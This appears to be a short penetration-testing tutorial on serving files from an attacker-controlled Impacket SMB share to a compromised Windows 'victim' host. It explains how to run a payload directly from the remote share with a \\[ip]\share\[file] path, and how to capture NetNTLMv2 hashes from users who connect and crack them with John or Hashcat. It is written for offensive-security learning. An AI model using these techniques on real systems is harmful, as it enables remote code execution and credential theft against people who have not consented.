This is actually my favorite method to transfer a file to a Windows host. SMB is built in to Windows and doesn’t require any special commands as You can simply use the standard copy and move commands and SMB handles the file transferring automatically for you. What’s even better is Windows will actually let you execute files via paths, meaning you can download and execute a payload in one command!
Enter smbserver.py, part of the Impacket project To launch a simple SMB server on port 445, just specify a share name and the path you want to share: The python script takes care of all the configurations for you, binds to 445, and accepts any authentication. It will even print out the hashed challenge responses for any system that connects to it.
Proof of concept
After entering the victim’s machine with low privilege (eg. reverse shell) Here we will see a warning message : This Program cannot run in DOS mode, that means this System OS cannot run program or payload greater than 16bit, If the program doesn’t allow to run on his OS, we can run the program through our smbserver.
Copy the files you want to use in the directory that is open to share.
Executing files from SMB. Because of the way it possible to just execute our binary directly from the SMB share without even needing to copy it over first. Just run the executable as if it were already local and the payload will fire:
\\[ip]\share\[your file in share folder]
If you look at the output from smbserver.py, you can see that every time we access the share it outputs the NetNTLMv2 hash from the current Windows user. You can feed these into John or Hashcat and crack them if you want (assuming you can’t just elevate to System and get them from Mimikatz)